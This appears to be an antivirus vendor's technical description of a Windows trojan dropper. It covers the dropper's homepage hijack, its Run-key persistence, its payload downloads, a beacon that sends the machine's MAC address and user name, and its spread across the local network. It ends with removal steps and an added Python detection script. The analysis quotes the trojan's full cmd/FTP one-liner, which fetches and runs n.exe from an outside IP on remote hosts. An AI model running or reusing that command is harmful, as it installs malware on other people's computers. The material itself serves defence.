
Trojan-Dropper.Win32.StartPage.eba

Detected Jun 29 2011 09:10 GMT
Released Jun 29 2011 11:00 GMT
Published Oct 10 2011 07:30 GMT

Technical Details

A trojan program that installs and launches other software on the infected computer without the user's knowledge. It is a Windows application (PE EXE file), 25169 bytes in size. The program is packed by an unknown packer. Its unpacked size is around 74 kB. Written in C++.


Payload

If the path to the trojan file does not contain the character sequence "ommon", the trojan extracts a script from its body and launches this script under the following name:

%ProgramFiles%\<rnd>.hta
(md5: D7444767D527E6E97BD3EB85D60E800D)
<rnd> is a sequence of three Latin symbols, for example, "YSQ".

This file is 803 bytes and is detected by Kaspersky Antivirus as Trojan.VBS.StartPage.hw.

The launch of this trojan script leads to a change in the default home page and search page for the Internet Explorer browser by adding the following information to the system registry key:

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "www.5***ling.com"
"Search Page" = "www.5***iling.com"
"default_page_url" = "www.5***ling.com"
and also ensures the automatic launch of a copy of the trojan every time the system is started:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe"
The trojan then creates a copy of its file under the name "coiome.exe" and deletes its original file:
%ProgramFiles%\Common Files\sebsbvx\coiome.exe
The file also has its creation date set as "17.08.2009", and the directory in which the trojan copy is found is given the attributes "hidden" and "system":
%ProgramFiles%\Common Files\sebsbvx
When creating a copy of itself, the trojan may add a random sequence of symbols to the file so that the hash of each copy varies. The trojan may also add a sequence of "2" symbols to the file, thus increasing the size of its copy.

The trojan then launches its copy and shuts down.

The trojan downloads a file from the following URL:

http://j.q***800.com/b.jpg
and saves the downloaded file under the following name:
%WinDir%\Fonts\oh.ini
This file is a configuration file and is used further by the trojan. Using the system file:
%System%\sc.exe
it automatically launches services with the following names:
lanmanworkstation
lanmanserver
RpcLocator
Browser
NtLmSsp
LmHosts 
After this, it launches the above-mentioned services using the system file:
%System%\net1.exe
The trojan then sends data about the infected computer to the attacker's server in the following request:
http://tj.q***800.com/t/Count.asp?mac=<MAC-user's computer address>&ver=01&t=<name of computer user>
At the time this description was written, the server returned the following response:
addok
To conceal its work online, it deletes the files from the following directories in a separate string:
%userprofile%\Cookies\*.*
%userprofile%\Local Settings\Temporary Internet Files\*.*
%userprofile%\Local Settings\Temp\Cookies\*.*
Before deleting, it removes the "read only", "hidden", "system", and "archive" attributes from the files.

It creates a directory named:

%AppData%\f.exe
It deletes information from the registry about the service called:
JavaServe
It deletes the following files:
%ProgramFiles%\Internet Explorer\usp10.dll
%WinDir%\ModFan\mone.dll
%WinDir%\UoDo\game.dll
The trojan retrieves the following file from its body:
%WinDir%\Tasks\<rnd2>i.vbe
<rnd2> is a sequence of 3 random Latin symbols.

This file is 2117 bytes. It is an auxiliary file that the trojan uses in its further operation.

It then extracts the following file from its body:

%WinDir%\Tasks\<rnd3>e.exe
<rnd3> is a sequence of 3 random Latin letters, for example, "DNP".

This file is detected by Kaspersky Antivirus as Exploit.Win32.IMG-WMF.fk. The trojan writes the length of time the user's computer has been running into the extracted file, so that the file's hash differs each time it is created. The trojan may also add a sequence of "0" values to the file, so that its size may differ from 3748 bytes.

The trojan determines the IP-address of the user's computer and then reads and deciphers the previously retrieved configuration file named:

%WinDir%\Fonts\oh.ini
From this file the trojan obtains one of the following parameters, which it uses to launch the file:
%WinDir%\Tasks\<rnd3>e.exe <parameter1> <parameter2>
<parameter1> - IP-address (the trojan lists the IP-addresses of the local network where the infected computer is located)
<parameter2> - deciphered URL, received from the configuration file.

At the time this description was written, the configuration file contained the following link:

http://dh***88.org/p/mi.exe (32891 bytes, detected by Kaspersky Antivirus as Trojan-Downloader.Win32.Geral.adeh)
It then runs the following type of command:
%System%\cscript.exe %WinDir%\Tasks\<rnd2>i.vbe <IP-address of the attacked computer> administrator "" "cmd /c @echo open 61.129.51.245>>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get n.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b.dat&n.exe&n.exe&del n.exe"
The trojan therefore tries to download a file named "n.exe" from the FTP server and launch it on the attacked computer. After a successful launch, it deletes this file.

It deletes the file before shutting down:

%ProgramFiles%\<rnd2>.hta


Removal instructions

If your computer has not been protected with anti-virus software and has been infected with this malware, take the following actions to remove it:

  1. Delete the original trojan file (its location on the infected computer will depend on how the program got onto the computer).
  2. Using Task manager, end the trojan process: coiome.exe
  3. Delete the following files:
    %ProgramFiles%\<rnd>.hta
    %ProgramFiles%\Common Files\sebsbvx\coiome.exe
    %WinDir%\Fonts\oh.ini
    %WinDir%\Tasks\<rnd2>i.vbe
    %WinDir%\Tasks\<rnd3>e.exe
    
  4. Delete the following directory:
    %AppData%\f.exe
  5. Restore the changed parameter values for the system registry key:
    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Start Page"
    "Search Page"
    "default_page_url"
    
  6. Delete the following value from the system registry key:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "safe360" = "%ProgramFiles%\Common Files\sebsbvx\coiome.exe"
    
  7. Clear the Temporary Internet Files directory, containing the infected files:
    %Temporary Internet Files%
  8. Run a full Kaspersky Antivirus scan of the computer with updated antivirus databases.
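
Added example (not part of the original description and not Kaspersky Lab code): because the trojan pads its copies so that their hashes vary, this check matches the file-name patterns and the Run value listed above instead of hashes. The drive letters, profile path and sample listings are constructed assumptions.

```python
import re

RND = "[A-Za-z]{3}"  # <rnd>, <rnd2>, <rnd3>: three Latin letters

# Path templates from the description; "{rnd}" marks the random part.
TEMPLATES = [
    ("HTA script", r"%ProgramFiles%\{rnd}.hta"),
    ("trojan copy", r"%ProgramFiles%\Common Files\sebsbvx\coiome.exe"),
    ("configuration file", r"%WinDir%\Fonts\oh.ini"),
    ("VBE script", r"%WinDir%\Tasks\{rnd}i.vbe"),
    ("extracted executable", r"%WinDir%\Tasks\{rnd}e.exe"),
    ("f.exe directory", r"%AppData%\f.exe"),
]

def compile_patterns(env):
    # Expand %Var% prefixes, escape the literal parts, then swap in the <rnd> class.
    compiled = []
    for label, template in TEMPLATES:
        for var, value in env.items():
            template = template.replace(f"%{var}%", value)
        pattern = re.escape(template).replace(re.escape("{rnd}"), RND)
        compiled.append((label, re.compile(pattern, re.IGNORECASE)))
    return compiled

def find_artifacts(paths, env):
    # Return (label, path) for every path that fully matches a template.
    patterns = compile_patterns(env)
    return [(label, p) for p in paths for label, rx in patterns if rx.fullmatch(p)]

def suspicious_run_values(run_values):
    # run_values: name -> data, as read from the Run key named in the description.
    tail = r"\common files\sebsbvx\coiome.exe"
    return [name for name, data in run_values.items()
            if name.lower() == "safe360" or data.strip('"').lower().endswith(tail)]

# Constructed sample data (assumed default install locations, not from the page).
ENV = {"ProgramFiles": r"C:\Program Files", "WinDir": r"C:\WINDOWS",
       "AppData": r"C:\Documents and Settings\user\Application Data"}
SAMPLE_PATHS = [
    r"C:\Program Files\YSQ.hta",
    r"C:\Program Files\Common Files\sebsbvx\coiome.exe",
    r"C:\WINDOWS\Fonts\oh.ini",
    r"C:\WINDOWS\Tasks\abci.vbe",
    r"C:\WINDOWS\Tasks\DNPe.exe",
    r"C:\WINDOWS\Tasks\backup.vbe",                      # benign: wrong name shape
    r"C:\Program Files\Internet Explorer\iexplore.exe",  # benign
]
SAMPLE_RUN = {"safe360": r"C:\Program Files\Common Files\sebsbvx\coiome.exe",
              "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe"}

if __name__ == "__main__":
    for label, path in find_artifacts(SAMPLE_PATHS, ENV):
        print(f"{label}: {path}")
    print("Run values:", suspicious_run_values(SAMPLE_RUN))
```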


md5: 14210E624FCCF904799E90A589A4B975
sha1: 3EE389EA35C2264A6586C6A26E1635032C7D2FEB


Trojan-Dropper

Trojan-Dropper programs are designed to secretly install malicious programs built into their code to victim computers.

This type of malicious program usually saves a range of files to the victim's drive (usually to the Windows directory, the Windows system directory, temporary directory etc.), and launches them without any notification (or with a fake notification of an archive error, an outdated operating system version, etc.).

Such programs are used by hackers to:

  • secretly install Trojan programs and/or viruses
  • protect known malicious programs from being detected by antivirus solutions; not all antivirus programs are capable of scanning all the components inside this type of Trojan.